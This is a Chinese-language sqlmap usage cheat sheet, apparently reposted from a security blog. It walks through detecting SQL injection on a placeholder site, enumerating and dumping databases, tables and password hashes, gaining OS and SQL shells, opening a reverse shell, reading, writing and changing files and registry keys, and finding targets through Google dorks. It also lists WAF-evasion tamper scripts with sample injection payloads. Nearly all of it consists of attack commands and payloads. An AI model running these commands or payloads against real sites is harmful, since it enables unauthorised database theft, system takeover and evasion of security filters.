Sqlmap 特点
·数据库支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase 和 SAPMaxDB
·SQL注入类型包括SQL盲注、UNION注入、显错式注入、时间盲注、盲推理注入和堆查询注入等技术
·支持枚举用户、密码哈希、权限、角色、数据库、表和列
·支持执行任意命令
·自动识别密码加密方式,并且可以使用字典解密
·支持数据导出功能
使用说明:
注入点:www.xxx.com/user.jsp?id=1
1.判断注入是否存在
sqlmap.py -u "www.xxx.com/user.jsp?id=1"
2.获取数据库(Access数据库不需要获取)
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --dbs
3.查看当前应用程序所用数据库(Access数据库不需要获取)
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --current-db
4.列出指定数据库的所有表
####(-D 后面跟上一步获取到的数据库名字,Access数据库不需要加-D参数)
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --table -D "数据库"
5.读取指定表中的字段名称
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --columns -T "数据表" -D "数据库"
6.读取指定字段内容
sqlmap.py -u "www.xxx.com/user.jspid=1" --dump -C"字段" -T "数据表" -D "数据库"
在读取数据后,Sqlmap会把读取的数据转存到Sqlmap/output/目录下,文件以”Table.cvs”保存。
Sqlmap参数用法
URL 代表要测试的注入点
1.测试注入点权限
sqlmap.py -u "URL" --privileges //测试所有用户的权限
sqlmap.py -u "URL" --privileges -U sa //测试sa用户权限
2.执行Shell命令
sqlmap.py -u "URL" --os-cmd="net user" //执行 net user 命令
sqlmap.py -u "URL" --os-shell //系统交互的shell
3.获取当前数据库名称
sqlmap.py -u "URL" --current-db
4.执行了SQL命令
sqlmap.py -u "URL" --sql-shell //返回SQL交互的shell,可以执行SQL语句
sqlmap.py -u "URL" --sql-query="sql"
5.POST提交方式
sqlmap.py -u "URL" --data "POST参数"
6.显示详细的等级
sqlmap.py -u "URL" --dbs -v 1
-v 参数包含以下7个等级。
·0:只显示Python的回溯、错误和关键消息;
·1:显示信息和警告信息;
·2:显示调试信息;
·3:有效载荷注入;
·4:显示HTTP请求;
·5:显示HTTP响应头;
·6:显示HTTP响应页面的内容。
7.注入HTTP请求
sqlmap.py -r head.txt --dbs //head.txt 内容为 HTTP 请求
head.txt 可以为burpsuit抓包获取到的内容
8.直接连接到数据库
sqlmap.py -d"mysql://admin:admin@192.168.1.1:3306/testdb" --dbs
9.注入等级
sqlmap.py -u "URL" --level 3
10.将注入语句插入到指定位置(常用于伪静态注入)
sqlmap.py -u "http://www.xxx.com/id/2*.html" --dbs
11.使用 Sqlmap 插件
sqlmap.py -u "URL" --tamper "space2morehash.py"
Sqlmap Tamper
脚本名:apostrophemask.py
作用:用 utf8 代替引号
例子:
("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
要求:
all
脚本名:equaltolike.py
作用:like 代替等号
例子:
SELECT ·FROM users WHERE id=1
SELECT ·FROM users WHERE id LIKE 1
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
脚本名:space2dash.py
作用:绕过过滤‘=’替换空格字符(”),(’–‘)后跟一个破折号注释,一个随机字符串和一个新行(’n’)
例子:
('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
要求:
·MSSQL
·SQLite
脚本名:greatest.py
作用:绕过过滤’>’,用GREATEST替换大于号。
例子:
('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
要求:
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0
脚本名:
space2hash.py
作用:空格替换为#号随机字符串以及换行符
例子:
1 AND 9227=9227
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
要求:
·MySQL 4.0, 5.0
脚本名:apostrophenullencode.py
作用:绕过过滤双引号,替换字符和双引号。
例子:
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
要求:
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0
脚本名:halfversionedmorekeywords.py
作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
例子:
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
要求:
·MySQL < 5.1
脚本名:space2morehash.py
作用:空格替换为#号以及更多随机字符串换行符
例子:
1 AND 9227=9227
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
要求:
·MySQL >= 5.1.13
脚本名:appendnullbyte.py
作用:在有效负荷结束位置加载零字节字符编码
例子:
('1 AND 1=1')
'1 AND 1=1%00'
要求:
·Microsoft Access
脚本名:ifnull2ifisnull.py
作用:绕过对IFNULL 过滤。替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
例子:
('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
要求:
·MySQL
·SQLite (possibly)
·SAP MaxDB (possibly)
脚本名:space2mssqlblank.py(mssql)
作用:空格替换为其它空符号
例子:
SELECT id FROM users
SELECT%08id%02FROM%0Fusers
要求:
·Microsoft SQL Server
# ASCII table:
# SOH 01 start of heading
# STX 02 start of text
# ETX 03 end of text
# EOT 04 end of tra
nsmission
# ENQ 05 enquiry
# ACK 06 acknowledge
# BEL 07 bell
# BS 08 backspace
# TAB 09 horizontal tab
# LF 0A new line
# VT 0B vertical TAB
# FF 0C new page
# CR 0D carriage return
# SO 0E shift out
# SI 0F shift in
脚本名:base64encode.py
作用:用base64编码替换
例子:
("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
要求:
all
脚本名:space2mssqlhash.py
作用:替换空格
例子:
('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
要求:
·MSSQL
·MySQL
脚本名:modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
例子:
('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
要求:
·MySQL
脚本名:space2mysqlblank.py
作用:空格替换其它空白符号(mysql)
例子:
SELECT id FROM users
SELECT%0Bid%0BFROM%A0users
要求:
·MySQL
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
# -A0 -(MySQL only)
脚本名:between.py
作用:用between替换大于号(>)
例子:
('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0
脚本名:modsecurityzeroversioned.py
作用:包含了完整的查询与零版本注释
例子:
('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
要求:
·MySQL
脚本名:space2mysqldash.py
作用:替换空格字符(”)(’–‘)后跟一个破折号注释一个新行(’n’)
注:之前有个mssql的这个是mysql的
例子:
('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
要求:
·MySQL
·MSSQL
脚本名:multiplespaces.py
作用:围绕SQL关键字添加多个空格
例子:
('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
要求:
all
脚本名:space2plus.py
作用:用+替换空格
例子:
('SELECT id FROM users')
'SELECT+id+FROM+users'
要求:
all
脚本名:bluecoat.py
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like
例子:
('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'
要求:
·MySQL 5.1, SGOS
脚本名:nonrecursivereplacement.py
作用:双重查询语句。取代predefined SQL关键字with表示suitable for替代(例如.replace(“
SELECT”、”"))filters
例子:
('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
要求:
all
脚本名:space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
例子:
('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
要求:
all
脚本名:percentage.py
作用:asp允许每个字符前面添加一个%号
例子:
SELECT FIELD FROM TABLE
%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
要求:
·ASP
·Microsoft SQL Server 2000, 2005
·MySQL 5.1.56, 5.5.11
·PostgreSQL 9.0
脚本名:
sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
例子:
('1 AND 9227=9227--')
'1 AND 9227=9227--sp_password'
要求:
·MSSQL
脚本名:chardoubleencode.py 双url编码(不处理以编码的)
例子:
SELECT FIELD FROM%20TABLE
%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%25
4f%254d%2520%2554%2541%2542%254c%2545
脚本名:unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
例子:
('-1 UNION ALL SELECT')
'-1 UNION SELECT'
要求:
all
脚本名:charencode.py
作用:url编码
例子:
SELECT FIELD FROM%20TABLE
%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0
Notes:
·Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleset
·The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMS
脚本名:randomcase.py
作用:随机大小写
例子:
INSERT
InsERt
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0
脚本名:unmagicquotes.py
作用:宽字符绕过
例子:
1'AND 1=1
1%bf%27 AND 1=1–%20
Notes:
Useful for bypassing magic_quotes/addslashes feature
脚本名:randomcomments.py
作用:用/**/分割sql关键字
例子:
‘INSERT’
‘IN//S//ERT’
脚本名:versionedkeywords.py
作用:Encloses each non-function keyword with versioned MySQL comment
例子:
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
要求:
·MySQL
脚本名:charunicodeencode.py
作用:字符串unicode 编码
例子:
SELECT FIELD%20FROM TABLE
%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
要求:
·ASP
·ASP.NET
·Microsoft SQL Server 2000
·Microsoft SQL Server 2005
·MySQL 5.1.56
·PostgreSQL 9.0.3
Notes:
Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
脚本名:securesphere.py
作用:追加特制的字符串
例子:
('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
要求:
all
脚本名:versionedmorekeywords.py
作用:注释绕过
例子:
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
要求:
·MySQL >= 5.1.13
脚本名:space2comment.py
作用:
Replaces space character (‘‘) with comments ‘/**/’
例子:
SELECT id FROM users
SELECT//id//FROM/**/users
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0
Notes:
·Useful to bypass weak and bespoke web application firewalls
脚本名:halfversionedmorekeywords.py
作用:关键字前加注释
例子:
value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa
value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
要求:
·MySQL < 5.1
Sqlmap常用参数及说明
-b 获取 banner
-p 指定测试参数
-g 从 Google 中获取URL,-g "inurl:aspx?id="
--gpage=GOOGLEPAGE 指定 Google 页码
--union-check 是否支持 union 注入
--union-cols union 查询表记录
--union-test union 语句测试
--union-use 采用 union 注入
--proxy 代理注入
--threads 采用多线程
--user-agent 自定义 user-agent
--referer=REFERER HTTP referer 头
--proxy=PROXY 使用代理
--string 指定关键词
--tor 创建 tor 的匿名网络
--predict-output 常见的查询输出预测
--keep-alive 使用持久 HTTP(S) 连接
--eval=EVALCODE 使用HTTP参数污染
-a,-all 查询所有
--hostname 主机名
--is-dba 是否是管理员权限
--users 枚举所有的用户
--password 枚举所有的用户密码
--roles 枚举所有的用户角色
--schema 枚举 DBMS 模式
--count 检索所有的条目数
--dump 转存 DBMS 数据库表项目,需要制定字段名称(列名称)
--dump-all 转存 DBMS 数据库所有的表项目
--search 搜索列、表或数据库名称
--exclude-sysdbs 在枚举表时排除系统数据库
--sql-query=query 执行SQL语句
--file-read=RFILE 读取操作
--file--write=WFILE 写入操作
--file--dest=DFILE 绝对路径写入
--reg-read 读取一个 Windows 注册表项值
--reg-add 增加一个Windows 注册表项值数据
--reg-del 删除一个Windows 注册表项值数据
--reg-key=REGKEY Windows 注册表键
--reg-value=REGVAL Windows 注册表键值
--reg-data=REGDATA Windows 注册表的键值项数据
--reg-type=REGTYPE Windows 注册表键的值类型
--dump-format=DUMP 转存数据格式(CSV(default)、HTML或SQLITE)
--hex 使用十六进制数据检索功能
--output-dir=ODIR 自定义输出的目录路径
--update 更新Sqlmap
--purge-output 安全删除所有内容的输出目录
--check-waf 启发式检查 WAF/IPS/IDS 保护
--os-pwn 反弹shell
--cookie=COOKIE 指定 HTTP Cookie,预登录
--random-agent 使用随机选定的User-Agent
--tamper=TAMPER 使用 Sqlmap 插件
--level 测试等级(1-5),默认为 1
原文地址:
- https://kamisec.github.io/2017/07/Sqlmap%E5%B8%B8%E7%94%A8%E5%8F%82%E6%95%B0%E5%8F%8A%E8%AF%B4%E6%98%8E/